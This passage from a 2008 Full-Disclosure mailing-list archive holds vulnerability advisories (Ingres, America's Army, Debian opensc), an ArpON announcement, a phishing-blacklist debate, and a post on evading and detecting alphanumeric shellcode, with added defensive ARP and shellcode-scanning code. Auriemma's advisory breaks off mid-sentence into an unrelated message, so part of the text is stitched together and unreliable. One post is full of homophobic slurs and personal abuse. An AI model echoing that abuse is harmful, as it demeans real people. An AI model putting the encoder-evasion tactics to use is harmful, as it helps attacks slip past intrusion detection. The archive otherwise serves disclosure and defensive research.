Exploitation of this vulnerability allows an attacker to elevate their privileges from the "ingres" user to root. By itself, this is not that serious of a vulnerability. However, when combined with the libbecompat and verifydb vulnerabilities it allows an unprivileged local user to gain root privileges.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

"This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6."

For more information, refer to Ingres' advisory at the following URL.

http://www.ingres.com/support/security-alert-080108.php

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3357 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

07/20/2007  Initial vendor response
07/23/2007  Initial vendor notification
08/01/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From aluigi at autistici.org Sat Aug 2 19:15:17 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Sat, 2 Aug 2008 19:15:17 +0100
Subject: [Full-disclosure] Server termination in America's Army 2.8.3.1
Message-ID: <20080802191517.7829c548.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Applications:  America's Army
               http://www.americasarmy.com
Versions:      <= 2.8.3.1
Platforms:     Windows (tested), Linux and Mac
Bug:           server termination due to failed assertion
Exploitation:  remote, versus server
Date:          02 Aug 2008
Author:        Luigi Auriemma
               e-mail: aluigi at autistici.org
               web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From Wikipedia:
"America's Army (also known as AA or Army Game Project) is a tactical multiplayer first-person shooter owned by the United States Government and released as a global public relations initiative to help with U.S. Army recruitment."
#######################################################################

======
2) Bug
======

The AA server can be terminated remotely through a specific single spoofable UDP packet which leads to a failed assertion:

  "Assertion failed: VoiceIndex

Hi,

My name is Andrea Di Pasquale and I study at Secondary High School "S. Quasimodo" in Catania, Italy.

Some time ago I released a research project related to the security of the address resolution protocol Arp, the project name being Arpon (Arp handler inspection). Arpon makes the protocol secure without recurring to algorithms, SSL or any other technology which is not part of the standard protocol.

Arpon is a daemon based on the Arp handling mechanism in kernel space that uses different policies either in static environments (Static Arp Inspection algorithm), or in DHCP dynamic ones (Dynamic Arp Inspection algorithm). Arpon is written as a user space tool so it can work on posix platforms: in fact it is extensively tested on platforms such as Mac OS X, FreeBSD, OpenBSD, NetBSD and Linux.

Today I suggest you have a look at the project, because I think it has great potentiality, the only competitor on the market being Cisco's DAI on Catalyst 4500 devices (which uses DHCP to securify ARP; Arpon just uses the standard kspace protocol implementation instead). Furthermore, Arpon is Open Source software.

Links:
http://arpon.sourceforge.net/
http://arpon.sourceforge.net/documentation.html
http://arpon.svn.sourceforge.net/viewvc/arpon/

Thanks for the attention, I hope in your interest.

Cordially,
Andrea.
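Andrea's message names the static and dynamic inspection policies without showing what a check looks like. The C below is an added example written for this digest and is not ArpON's code: it parses an RFC 826 Ethernet/IPv4 ARP packet and applies a static-inspection policy against a fixed table of trusted IP-to-MAC bindings, accepting a reply that matches, flagging one that claims a trusted IP with a different MAC, and reporting senders the table does not know. The trusted table, the host addresses, the rogue MAC and the two sample replies are all constructed for the example; a real daemon would feed frames from a raw socket or pcap and would apply the verdict to the kernel ARP cache, which this code deliberately never touches.

```c
/* Added example (not ArpON's code): static ARP inspection against a fixed
 * table of trusted bindings, run over constructed ARP replies. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARP_LEN      28     /* Ethernet/IPv4 ARP packet per RFC 826, no Ethernet header */
#define ARP_OP_REPLY 2

struct binding { uint8_t ip[4]; uint8_t mac[6]; };

/* Constructed static table: what the administrator knows the LAN to be. */
static const struct binding trusted[] = {
    { {192, 168, 1, 1},  {0x00, 0x11, 0x22, 0x33, 0x44, 0x55} },   /* gateway */
    { {192, 168, 1, 10}, {0x00, 0x11, 0x22, 0x33, 0x44, 0x66} },   /* file server */
};

enum verdict { ARP_IGNORED = 0, ARP_ACCEPT = 1, ARP_SPOOFED = 2,
               ARP_UNKNOWN_HOST = 3, ARP_MALFORMED = 4 };

/* Parses one ARP packet and applies the static policy:
 *   malformed      -> reject (wrong hardware/protocol type or address sizes)
 *   not a reply    -> ignore (requests carry no binding to enforce)
 *   sender IP unknown to the table -> report (a strict policy drops it)
 *   sender IP known, MAC differs   -> spoofing attempt
 *   sender IP known, MAC matches   -> accept */
static enum verdict inspect_arp(const uint8_t *pkt, size_t len)
{
    if (pkt == NULL || len < ARP_LEN) return ARP_MALFORMED;
    uint16_t htype = (uint16_t)((pkt[0] << 8) | pkt[1]);
    uint16_t ptype = (uint16_t)((pkt[2] << 8) | pkt[3]);
    uint16_t oper  = (uint16_t)((pkt[6] << 8) | pkt[7]);
    if (htype != 1 || ptype != 0x0800 || pkt[4] != 6 || pkt[5] != 4)
        return ARP_MALFORMED;
    if (oper != ARP_OP_REPLY) return ARP_IGNORED;

    const uint8_t *sha = pkt + 8;    /* sender hardware address */
    const uint8_t *spa = pkt + 14;   /* sender protocol address */
    for (size_t i = 0; i < sizeof trusted / sizeof trusted[0]; i++) {
        if (memcmp(spa, trusted[i].ip, 4) != 0) continue;
        return memcmp(sha, trusted[i].mac, 6) == 0 ? ARP_ACCEPT : ARP_SPOOFED;
    }
    return ARP_UNKNOWN_HOST;
}

/* Builds a constructed ARP reply "spa is at sha" addressed to tha/tpa. */
static void make_reply(uint8_t out[ARP_LEN], const uint8_t sha[6], const uint8_t spa[4],
                       const uint8_t tha[6], const uint8_t tpa[4])
{
    static const uint8_t hdr[8] = {0, 1, 0x08, 0x00, 6, 4, 0, ARP_OP_REPLY};
    memcpy(out, hdr, 8);
    memcpy(out + 8, sha, 6);  memcpy(out + 14, spa, 4);
    memcpy(out + 18, tha, 6); memcpy(out + 24, tpa, 4);
}

/* Constructed inspected host. */
static const uint8_t host_mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x77};
static const uint8_t host_ip[4]  = {192, 168, 1, 50};

/* Sample 1: the real gateway answering.  Expected verdict: ARP_ACCEPT. */
static enum verdict genuine_gateway_reply(void)
{
    uint8_t pkt[ARP_LEN];
    make_reply(pkt, trusted[0].mac, trusted[0].ip, host_mac, host_ip);
    return inspect_arp(pkt, sizeof pkt);
}

/* Sample 2: a reply claiming the gateway IP from a different (constructed)
 * MAC, the pattern a cache-poisoning attempt leaves.  Expected: ARP_SPOOFED. */
static enum verdict rogue_gateway_reply(void)
{
    static const uint8_t rogue_mac[6] = {0xde, 0xad, 0xbe, 0xef, 0x00, 0x01};
    uint8_t pkt[ARP_LEN];
    make_reply(pkt, rogue_mac, trusted[0].ip, host_mac, host_ip);
    return inspect_arp(pkt, sizeof pkt);
}

int main(void)
{
    static const char *names[] = {"ignored", "accept", "SPOOFED", "unknown host", "malformed"};
    printf("genuine gateway reply: %s\n", names[genuine_gateway_reply()]);
    printf("rogue gateway reply:   %s\n", names[rogue_gateway_reply()]);
    return 0;
}
```

Under the static policy a reply for an address outside the table is the interesting operational case: ArpON's dynamic (DHCP-driven) policy would instead learn those bindings from lease traffic, which is the distinction Andrea draws between the two algorithms.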
From stuart at cyberdelix.net Sun Aug 3 03:05:14 2008
From: stuart at cyberdelix.net (lsi)
Date: Sun, 03 Aug 2008 03:05:14 +0100
Subject: [Full-disclosure] simple phishing fix
In-Reply-To: <4890DCD1.25286.1B878EF@nick.virus-l.demon.co.uk>
References: <48903106.2932.25DFF97E@stuart.cyberdelix.net> <4890DCD1.25286.1B878EF@nick.virus-l.demon.co.uk>
Message-ID: <4895206A.3270.3926E595@stuart.cyberdelix.net>

To cut to the chase, approx 80% of all phish target 1 of 20 or less companies. [1] [2] [7] [8] [9]

I also found a paper which suggests the blacklist might work. [6] I found three other papers that reviewed phish detection in-depth, however none of them seemed to mention filtering on the FROM field. [4] [5] [10]

I also detail a fix for unblocked senders (e.g. to selectively allow mail from spoofed domains, such as Paypal), see below.

Nick says the blacklist won't stop phishing, per se, because phishers will begin to target unlisted companies. While I agree that phishers will begin to target unlisted companies, it does not follow that phishing will continue to be profitable. It MAY still be profitable to be a phisher in these circumstances. What will definitely be true is that such a blacklist will make phishing less profitable, this being because the total amount of funds available to phish has been substantially reduced, while at the same time, locating new victims is more difficult. What will also be true is the list will stop phish from listed companies from clogging mail systems, particularly as most users never have any need to receive mail from those companies.

I accept that the blacklist MAY NOT make phishing unprofitable, and the blacklist WILL NOT stop phish from unlisted companies.

So, the list WILL reduce junk and WILL hit phishers in the back pocket. And this is a bad idea?

Assumptions:

1. the phisher does NOT know which bank his potential victims use
2. the phisher is seeking to maximise revenue, and minimise costs
3. creating the fake mail and site is time-consuming

-------

likely factors affecting phishing profitability:

Here's a description of the phishing business model, there's no reference cos I made it up. As you can see there's a few more costs than actually spamming out the phish, which I agree may be without cost.

total cost = time + money to create the fake mail
  PLUS time + money to create the fake web site
  PLUS time + money to obtain hosting for the fake web site
  PLUS time + money to obtain/maintain/rent the botnet used to send the fake mail
  PLUS time + money to launder the cash
  PLUS time + money on personal security

total revenue = total number of mails sent
  MINUS mails blocked - bad recipient address
  MINUS mails blocked - filtered (anti-spam/phish filter etc)
  MINUS mails deleted - end-user not a customer of target institution
  MINUS mails deleted - end-user not fooled
  MINUS mails deleted - end-user not interested
  MINUS mails deleted - technical issue
  MULTIPLY average profit per successful phish

Most articles on phishing describe how the fake mail and fake website are "carefully" designed, and "carefully" selected recipient lists are used. Careful means slow, AFAIK. The more careful you are, the more successful your phish, BUT the longer it takes you to make, the more money you need to make to break even. So the rational phisher will find a balance there. The point is, the rational phisher will not bang out a new site every five minutes. The site needs to be convincing, the email needs to be convincing, and being convincing takes time.

I might be wrong. The kits Nick mentioned might make it all easy. But Nick also mentions that those kits are backdoored. So I think that means the rational phisher is going to have to make his own pages from scratch. And that is gonna take time. Time = money.
If the phisher makes $20/hr from phishing, but he could be making $50/hr spamming, it's costing him $30/hr to be a phisher. The rational phisher would cease phishing in these circumstances.

--------

statistics showing that blocking the top 20 brands will have a big impact:

"..These brands exhibited Pareto-type properties in that a small number of brands accounts for a large number of actual phishing sites." [9]

Approx 80% of all phish target 1 of 20 or less companies. [1] [2] [7] [8] [9]

If those companies were widely blacklisted, 80% of all phish/phishers would need to make new phishing sites, and find new victims.

Note that 20 is a very small number and a blacklist of this size, including variants, is manageable.

Note that although 20 is a very small number, it covers all of the most-profitable-to-phish companies currently being phished (assuming that profitability-to-phish is proportionate to total phishing attempts, this may be wrong, but if it is wrong, some phishers are wasting their time).

Although the top 20 account for 80% of total phish, blacklisting mail from those companies will not stop 80% of phish, because phishers will presumably move on to target companies that are not blacklisted. However, those companies are less profitable for phishers - if they were more profitable, then those companies would be in the top 80% already. There are many reasons why they might be less profitable:

- ease of execution
- size of customer base
- total funds available
- additional benefits or penalties

The blacklist would make phishing less profitable because it forces less-profitable companies to be targeted. When an unlisted company is targeted, it is added to the list. Eventually, all high-profit companies will be listed.

Nick suggests that the phishers will just send more emails, I suggest this will just get them detected, blocked, and taken down faster.
Nick seems to be suggesting that phishers will always be able to make a healthy profit by targeting small institutions. This might continue to be true if:

- costs to phishers are small, and remain so
- revenue is decent, and remains so

However various technologies are working to push costs up and revenue down, this is going to continue. Phishers, OTOH cannot do much more than they are already doing to maximise their revenues, that means as anti-phishing technology evolves, phishing profits are going to fall. How much they fall depends on the tech. There is a definite possibility that some/all phishers will not be able to cover their costs. Certainly, anti-phishing technologies should seek to maximise this possibility. The harder phishing is, the less profitable it becomes.

Nick mentioned an infinite set of domain names, I believe at that time he was confused between the domain name stated in the FROM field (which is what I am focusing on) and domain names listed in the body text (I'm ignoring those). The set of domain names in the from field is very small, 714 items in total [2], most of which have only been phished a few times. I agree the set of domain names in the body text is infinite.

It seems to me that the FROM field is the most obvious sign of a phish. If the mail is FROM a company I don't do business with, of course it's a phish, no need for any further testing. But I don't need to list every company I don't do business with, I only need to list every company I don't do business with *that phishes me*. This list is currently very small, as the referenced statistics show.

---------

ease of use by end-users:

I agree end-users can't be relied on. The way it could work, say with a webmail service, is that the webmail service has a page, "my phishing preferences", on there is a list of blocked-by-default companies (the blacklist). The user scrolls down to the company they want to unblock and unchecks the "blocked" box. Then they click Save.
For corporate environments, a similar function could be performed by the IT dept as part of their usual antispam/antivirus routine. All users are blocked by default from receiving all mail from any blacklisted company. To receive mail from a blacklisted company, fill in a form on the intranet and await a response in email from the IT dept. The IT dept does their magic using procmail or similar.

For end-users with POP3 clients the blacklist would ideally be an installation component, packaged with the binary, the user would go to Tools.. Options.. Phishing Preferences. The default setting for each company listed is "blocked". The user scrolls down to the company they want to unblock and unchecks the "blocked" box. Then they click Save.

If an updated blacklist was deployed, users would want to see the list of new blocked companies, in case they were corresponding with them previously.

I agree that a list with hundreds of thousands of institutions on it would not be workable. However the statistics show that currently, this is not required. [1] [2] [7] [8] [9]

---------

how to secure "unblocked" companies:

So above I went through a few ways in which users could unblock companies they want to receive mail from, it's obviously a vulnerability when they do this, but it can be fixed, Paypal's strategy is to include a pre-shared secret in the body text of the mail. This requires two filtering rules, the second conditional on a match on the first. This is not a problem for some mail clients such as Pegasus Mail but may be a problem for lesser-evolved beasts such as Outlook.

This same technique (the pre-shared secret) could be used by any targeted company that sends emails to customers, all that is needed is that the filter knows the secret, and takes that into account when filtering. Ideally, what would happen is that when the user unblocks a company, they are prompted for the pre-shared secret. Missing secret = unable to unblock.
The filtering rules ideally would then be autoconfigured in the correct way by the software/IT dept.

--------

variations/obfuscation/armouring:

There is very little evidence, in the databases I checked [1] [2], of the use of variations such as wachov1a, although added spaces, missing hyphens and so on do happen. Obfuscation/armouring is a common spam tactic, but phish are seeking to be as legitimate as possible, and any kind of obfuscation reduces total revenue. This is a distinguishing feature between phish and spam, and it permits the possibility that techniques that don't work against spam, such as a blacklist, might be successfully used against phish.

If the variations get excessive, I suggest regular expressions. Again, not a problem for some mail clients, but other software such as Thunderbird does not support them (last I checked). It is *hoped* that the power of regexes will be enough - there is a limit on how much obfuscation can be used, as it potentially alerts the user to the phish. Time will tell.

---------

this idea elsewhere on the net:

Three academic papers [4] [5] [10] review the literature concerning phish detection in detail, however none of them list analysis of the FROM field of the mail. That is, they don't even list it and dismiss it, because of x, y and z, the technique is simply not mentioned.

One paper [6] notes that the FROM field "likely matches legitimate mail from [the targeted company]"; later it says "domain blacklisting can be used effectively to flag and drop messages".
---------

references:

[1] shows that the top 10 targeted companies account for 12166 of 16527 phish (73%)
    http://www.phishtank.com/stats/2008/04/

[2] shows a total of 714 targeted companies - with some duplication - most with 1 or 2 phishing attempts
    http://www.millersmiles.co.uk/scams.php

[3] gives an estimate of average profit per successful phish = USD 1224:
    http://www.markmonitor.com/download/wp/wp-whofights.pdf

[4] "Behind Phishing: An Examination of Phisher Modi Operandi" (contains a useful literature review)
    http://www.antiphishing.org/reports/behindPhishingWhitePaper.pdf

[5] "Learning to Detect Phishing Emails" (contains a useful literature review)
    http://www.cs.cmu.edu/~sadeh/Publications/Small%20Selection/www07%20FINAL%20SUBMISSION.pdf

[6] "Evolution of Phishing Attacks" (mentions that filtering on the FROM field might be beneficial)
    http://www.antiphishing.org/Evolution%20of%20Phishing%20Attacks.pdf

[7] shows a list similar to Millers' Miles
    http://www.ciphertrust.com/resources/statistics/phishing.php

[8] "Phishing Activity Trends Report" states that the top 17 targeted companies account for 80% of all phish
    http://www.antiphishing.org/reports/apwg_report_August_2006.pdf

[9] "Phishing Attacks: Analyzing Trends in 2006" (states that "the top 10 spoofed brands account for nearly 85% of phishing web sites")
    http://www.ceas.cc/2007/papers/paper-34.pdf

[10] "Anti-Phishing Best Practices for ISPs and Mailbox Providers" (contains a useful literature review)
    http://www.antiphishing.org/reports/bestpracticesforisps.pdf

PS no I'm not trolling I've been using this approach for 6 months or so and it works great for me, so I thought I'd share it ...

PPS "80% of all phish target 1 of 20 or less companies" DOES NOT MEAN that 20% of phish target 2 companies or more, each phish targets 1 company, but that 1 company is, 80% of the time, in a list of 20 companies that are commonly phished.
And the list of companies might be even smaller than 20, depending on whose stats you're reading.

---
Stuart Udall
stuart at at cyberdelix.dot net - http://www.cyberdelix.net/
---
 * Origin: lsi: revolution through evolution (192:168/0.2)

From wrowe at rowe-clan.net Fri Aug 1 21:39:18 2008
From: wrowe at rowe-clan.net (William A. Rowe, Jr.)
Date: Fri, 01 Aug 2008 15:39:18 -0500
Subject: [Full-disclosure] how to request a cve id?
In-Reply-To:
References:
Message-ID: <48937476.1050007@rowe-clan.net>

Steven M. Christey wrote:
> CVE requests can be sent to cve at mitre.org or to me directly. My PGP
> key is below, or accessible from the MIT public key server.
> Alternately, you can request them from Candidate Numbering Authorities
> (CNAs) which include the security teams at Red Hat, Microsoft, and
> Debian, or third-party coordinators including iDefense and CERT/CC.
>
> The amount of information you need to provide can vary and is somewhat
> negotiable. We need to be sure how many CVEs to assign.
>
> Naturally, there is no charge for CVE requests. We encourage people
> to try to coordinate with the vendor, since the quality of information
> almost always suffers if you don't do so.

I'd like to expand on Steven's comments; it is usually best to obtain that CVE from the vendor/project, if they already participate in Mitre. This ensures that you are not creating a duplicate ID. Of course if they do not participate, you'll need to follow Steven's directions above. If they do participate, it ensures that duplicate CVEs won't need to be discarded. Where your vulnerability overlaps a prior report, you should be told which CVE applies to your report.

It may be best where you have a cross project/vendor vulnerability to simply request one first, and then notify each project/vendor affected of the specific CVE you have allocated at the time you notify them of the vulnerability.
From xploitable at gmail.com Sun Aug 3 22:36:09 2008 From: xploitable at gmail.com (n3td3v) Date: Sun, 3 Aug 2008 22:36:09 +0100 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> Message-ID: <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> On Sun, Aug 3, 2008 at 9:43 PM, solemn wrote: > lol. i <3s u, n3td3v. > Yes, they are both a bunch of fucking faggots. He is an elite haxor after all, why would he leave the DNS for his own company vulnerable, or did he over look something so obvious to check before releasing the exploit to the wild, or is he not as elite as he makes out to be and actually didn't think to check DNS infrastructure linked to his company. The faggot tried to say nothing at his company was compromsied so he has nothing to be blamed for, no HD Moore was a fucking faggot who should have checked out AT&T wasn't vulnerable. He has no excuse for what happened, he is a global international hacker leading the release of the exploit code, its his entire responsibility to make sure his company is secure, even if the servers that were vulnerable were owned by AT&T. The AT&T servers are still on his watch, because he is responsible for the global international release of the exploit code. So if HD Moore thinks he's off the hook for his company's website getting hacked via AT&T, think again, you were hacked HD Moore and its all your fucking fault. Fucking lamer. Don't go talking shit on your blog that it had absolutely nothing to do with you, every single server on the internet that gets compromised because of your irresponsible showing off by releasing the exploit code when asked not to is all your fucking fault. Look, mommy and daddy I built a sandcastle, come look at what I built! 
That's the fucking mentality you had when you released the exploit code without the permission of the security industry you fat American Austin Texas fuckhead.

All the best,

n3td3v

> On Sat, Jul 26, 2008 at 1:19 PM, n3td3v wrote:
>> Joel Hruska from Ars Technica has said HD Moore and I)ruid are
>> "enterprising little children".
>>
>> New DNS exploit now in the wild and having a blast
>> http://arstechnica.com/news.ars/post/20080726-new-dns-exploit-now-in-the-wild-and-having-a-blast.html
>>
>> All the best,
>>
>> n3td3v
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>

From Valdis.Kletnieks at vt.edu Mon Aug 4 04:44:26 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 03 Aug 2008 23:44:26 -0400
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: Your message of "Sun, 03 Aug 2008 22:36:09 BST." <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com>
Message-ID: <15949.1217821466@turing-police.cc.vt.edu>

On Sun, 03 Aug 2008 22:36:09 BST, n3td3v said:
> He has no excuse for what happened, he is a global international
> hacker leading the release of the exploit code, its his entire
> responsibility to make sure his company is secure, even if the servers
> that were vulnerable were owned by AT&T.

And how, *exactly*, is he supposed to fix servers that aren't under his administrative control?

Tell you what - the next time that the company that you get Internet access from has an issue, why don't you go ahead and fix it for them, and let us know how that all works out, 'kay?
From thijs at debian.org Mon Aug 4 10:00:29 2008
From: thijs at debian.org (Thijs Kinkhorst)
Date: Mon, 4 Aug 2008 11:00:29 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1627-1] New opensc packages fix smart card vulnerability
Message-ID: <20080804090029.BA349327609@morgana.loeki.tv>

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1627-1                  security at debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
August 04, 2008                       http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : opensc
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-2235

Chaskiel M Grundman discovered that opensc, a library and utilities to handle smart cards, would initialise smart cards with the Siemens CardOS M4 card operating system without proper access rights. This allowed everyone to change the card's PIN.

With this bug anyone can change a user PIN without having the PIN or PUK or the superuser's PIN or PUK. However it can not be used to figure out the PIN. If the PIN on your card is still the same you always had, there's a reasonable chance that this vulnerability has not been exploited.

This vulnerability affects only smart cards and USB crypto tokens based on Siemens CardOS M4, and within that group only those that were initialised with OpenSC. Users of other smart cards and USB crypto tokens, or cards that have been initialised with some software other than OpenSC, are not affected.

After upgrading the package, running pkcs15-tool -T will show you whether the card is fine or vulnerable.
If the card is vulnerable, you need to update the security setting using:

  pkcs15-tool -T -U

For the stable distribution (etch), this problem has been fixed in version 0.11.1-2etch1.

For the unstable distribution (sid), this problem has been fixed in version 0.11.4-4.

We recommend that you upgrade your opensc 0.11.1-2etch1 package and check your card(s) with the command described above.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From Avraham.Schneider at aladdin.com Mon Aug 4 11:02:26 2008
From: Avraham.Schneider at aladdin.com (Avraham Moshe Schneider)
Date: Mon, 4 Aug 2008 13:02:26 +0300
Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection
Message-ID: <6C653A611ACD78469EA1DF7954A51ED1042331DC@extlv102.eAladdin.org>

Hello Full-Disclosure,

I'd like to share with you some of the work I've done researching alphanumeric shellcode detection. Although alphanumeric shellcode encoding isn't new, I believe this post will present you with some value.

There are two main reasons why someone might use an alphanumeric shellcode encoder -
1. To encode bytes not allowed by the vulnerable application
2. To evade detection by an Intrusion Detection system.

Even though the first case is arguably the more common occurrence, and even though there might be more room for improvement there, I have focused my work on the second. You will find attached an alphanumeric shellcode encoder that makes the decoder routine detection more difficult.
It has some cool new features, but again, the purpose of this post is not that much about the new decoder, but rather on the subject of using alphanumeric shellcodes to evade detection, and investigating generic detection possibilities.

I'm aware of several methods for detecting shellcode executing attacks:

- Detect attacks by understanding the vulnerable protocol fields/lengths and checking the supplied values

This is straightforward but has little (or nothing) to do with alphanumeric shellcode encoding. The IDS is updated with new signatures for the new threats. It would be hard for an attacker to evade detection if the IDS has properly added a signature against the vulnerability itself, and the IDS is not vulnerable to evasion attacks at a lower protocol layer. The downside is, you can only detect what you know, so the IDS has to be constantly updated with signatures for the new threats.

- Detect attacks by searching for known shellcode patterns

This is also straightforward. The IDS is updated with signatures for all known shellcode patterns. The advantage of doing this is that due to the skills required and the time consuming process involved, the attacker is less likely to implement his own custom shellcode. This allows the IDS to detect unknown attacks without updating it with new signatures. Of course it does not remove the IDS vendor from the responsibility of adding new signatures to detect new threats, but it adds another line of defense.

I listed above a couple of cases for which attackers may need to encode their shellcode using an alphanumeric encoder. Evading this detection is one of them, and to counter that, we have yet another line of defense:

- Detect attacks by searching for known encoded shellcode's decoder routine patterns

Since the encoded shellcode must include a decoder routine that will be used to decode the encoded data (and then execute it), the IDS is updated with signatures for the known decoder routines.
This adds an important value to the previous detection method. But it still leaves a hole - encoders that generate difficult to detect decoder routines (like the tool I have attached). Emulation, or profiling may be used to detect these generically, but since the IDS does not know where to start scanning, and since the IDS cannot perform these tests on all bytes of all streams (costly in terms of CPU), it may want to -

- Detect attacks by searching for known shellcode's encoded data

This requires updating the IDS with smart signatures that can decode alphanumeric streams and compare decoded data against known shellcode patterns. It requires updating the IDS with new decoding algorithms. Assuming the use of alphanumeric encoders/decoders and their limitation of using a limited instruction set, there is a difficulty of coming up with new encoding schemes and this detection method really adds a great value to the IDS.

The previous shellcode encoder Matt Conover, Soren Macbeth and I wrote back in 2004 used a fixed key throughout the shellcode. It may seem that detecting the encoded data would be easy with a fixed key and a known shellcode pattern, but since you have 62 different keys to choose from (assuming alphanumeric char-set composes 0-9A-Za-z), you would need to check each known pattern against 62 different keys. In that sense, the previous work would be of greater use for an attacker to evade this detection method, but on the other hand, the previous mentioned detection method would detect the decoder routine, as it is not that stealthy.

The presented decoder is IMO harder to detect yet detection of the encoded data is much simpler. The attacker would be faced with this tradeoff, and an IDS that implements all of the above techniques, would provide IMO good defense against known and unknown threats involving shellcode execution.
There might be an encoding/decoding technique that does not exhibit this tradeoff, for example, appending a random fixed number of bytes between encoded data bytes that the decoder could skip. I haven't yet tried implementing this due to time constraints, but I believe it is possible.

I have attached the new encoder/decoder code, as well as a function that may be used to scan alphanumeric strings. This function should not be used in an IDS product for the following reasons:
1. It uses a naive search algorithm.
2. It scans a buffer and not a stream.
3. It rescans the entire buffer with each decoder.

IMO, implementing a multi-pattern type Boyer-Moore algorithm, such as the one presented by Sun Wu and Udi Manber, is a very good IPS solution for the following reasons:
1. The number of skip bytes is double the pattern length.
2. Since we are looking for a known part of a known shellcode, we know the shellcode length - hence -
3. On a non-alphanumeric byte we can skip double the length of the shellcode minus the position of the pattern within the shellcode. (basically we can add the knowledge of the original shellcode length to the skip table)

I have implemented a single pattern Boyer-Moore algorithm implementation that handles a file stream but as it does not satisfy the requirements listed above, and in order to reduce the size of the code I have not included it here. If you are interested, contact me privately. Also, please feel free to e-mail me with any questions or comments.

I'd like to thank Matt Conover for reviewing my work and giving me good feedback.

Regards,
Avri

**********************************************************************************************
The contents of this email and any attachments are confidential. It is intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies.
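The detection side of the post above, as an added example that is not part of the original message and is not the author's attached alnum_decoder_encoder.c: a Python scanner that searches a buffer for a known fragment of a known shellcode under all 62 fixed keys, and uses the known shellcode length to skip alphanumeric runs that are too short to hold the whole encoded payload. The encoding it decodes (two alphabet symbols per byte, each nibble shifted by the key) is a constructed toy stand-in, since the message does not describe the real encoder's scheme; `KNOWN`, `SAMPLE`, `scan`, `toy_encode` and `toy_decode` are names introduced here, the sample traffic is constructed, and the two pruning rules are my own formulation of the "add the shellcode length to the skip table" idea, not the author's exact formula.

```python
import re
import string

# The 62-symbol alphabet the post assumes: 0-9A-Za-z.
ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase
INDEX = {ord(c): i for i, c in enumerate(ALPHABET)}
ALNUM_RUN = re.compile(rb"[0-9A-Za-z]+")


def toy_encode(data: bytes, key: int) -> bytes:
    """Hypothetical fixed-key encoder, constructed for this example only (it is
    not the encoder from the attachment). Each byte becomes two alphabet
    symbols: (high nibble + key) mod 62, then (low nibble + key) mod 62."""
    out = []
    for b in data:
        out.append(ALPHABET[((b >> 4) + key) % 62])
        out.append(ALPHABET[((b & 0x0F) + key) % 62])
    return "".join(out).encode("ascii")


def toy_decode(text: bytes, key: int):
    """Inverse of toy_encode; returns None if any symbol cannot have been
    produced under `key` (only 16 of the 62 symbols are valid per key)."""
    if len(text) % 2:
        return None
    out = bytearray()
    for i in range(0, len(text), 2):
        hi = (INDEX[text[i]] - key) % 62
        lo = (INDEX[text[i + 1]] - key) % 62
        if hi > 15 or lo > 15:
            return None
        out.append((hi << 4) | lo)
    return bytes(out)


def scan(buf: bytes, known: bytes, frag_start: int, frag_end: int):
    """Return sorted (offset, key) pairs where `buf` holds `known` encoded under
    one of the 62 keys. The signature carries only known[frag_start:frag_end];
    the full length of `known` is used first to prune, then to confirm.

    Pruning (my variant of the post's skip-table idea, not the author's formula):
      1. Only alphanumeric runs are searched, and a run shorter than the whole
         encoded payload is skipped without looking inside it, because a
         non-alphanumeric byte can never sit inside the encoded data.
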